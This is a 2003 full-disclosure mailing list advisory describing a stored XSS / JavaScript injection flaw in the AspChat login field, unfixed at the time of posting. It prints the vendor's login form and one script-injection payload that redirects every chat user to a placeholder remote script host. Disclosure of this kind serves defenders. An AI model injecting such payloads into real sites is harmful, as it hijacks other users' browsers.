Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Asp Chat - .ASP XSS / JS Injection

From: "morning_wood" <se_cur_ity () hotmail com>
Date: Mon, 16 Jun 2003 04:25:52 -0700
------------------------------------------------------------------
          - EXPL-A-2003-008 exploitlabs.com Advisory 008
------------------------------------------------------------------
                 -= Asp Chat ( chat.asp ) =-



morning_wood
June 16, 2003
exploitlabs.com


Vunerability(s):
----------------
1. .ASP XSS / JS Injection

alot more im sure...


Product:
--------

AspChat
http://www.123apps.net/page.asp?page=aspchat


Description of product:
-----------------------

ASP Chat - Freeware
"Web based chat application with user friendly interface.
 Easy to install just copy to your folder where you want to use it.
 No database and no components needed. Download and use it for free."

Download:

http://download.123apps.net/files/aspchat.zip <-- dont work
http://www.zone-h.org/download/file=2848/



VUNERABILITY / EXPLOIT
======================
Remote:
-------
yup

exploit code here... ( not realy needed but it shows the basic flaw )

this is a direct rip of the login page, at
http://www.123apps.net/demo/aspchat/

------------ snippy -------------------

<body bgcolor="#FFCC99" topmargin="5">
<center>
<font face='verdana,arial' size='2'>Type nickname
<form action='chat.asp?event=login' method='post'>
<input type='text' name='login' size='10'>
<input type='submit' value='Enter'>
</form>
<hr size='1'>
ASP Chat by <a href='mailto:info () 123apps net'>123apps.net</a>

----------- end snippy ---------------

as we can see by the poc script there is no length checking on the
login.
the login name ( or script from poc )is "pushed" into chat as the user
name,
rendering XSS and remote includes by way of...

<SCRIPT>location.href="http://example.com/remote-nasty-script.ext;</sc
ript>

or whatever have you. all users are affected by this that are
currently logged in or
 log in later as there is some "persistance" as this...


http://www.123apps.net/demo/aspchat/  or

http://www.123apps.net/demo/aspchat/chat.asp    shows.

the depth of this has not been fully exploited, I leave it to the
vendor to fix ASAP.
oh... you can chat normaly and then decide to "throw" urls or bad js
at people ... i got bored real fast with that.




Vendor Fix:
-----------
No fix on 0day



Vendor Contact:
---------------
info () 123apps net - Concurrent with this advisory


Credits:
--------

morning_wood
http://exploitlabs.com "were finding your holes"
morning_wood () frame4 com - get tested


----------------------------------------

be a good vendor... test your products first, it is your problem, fix
it.

http://nothackers.org - it's t0day
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: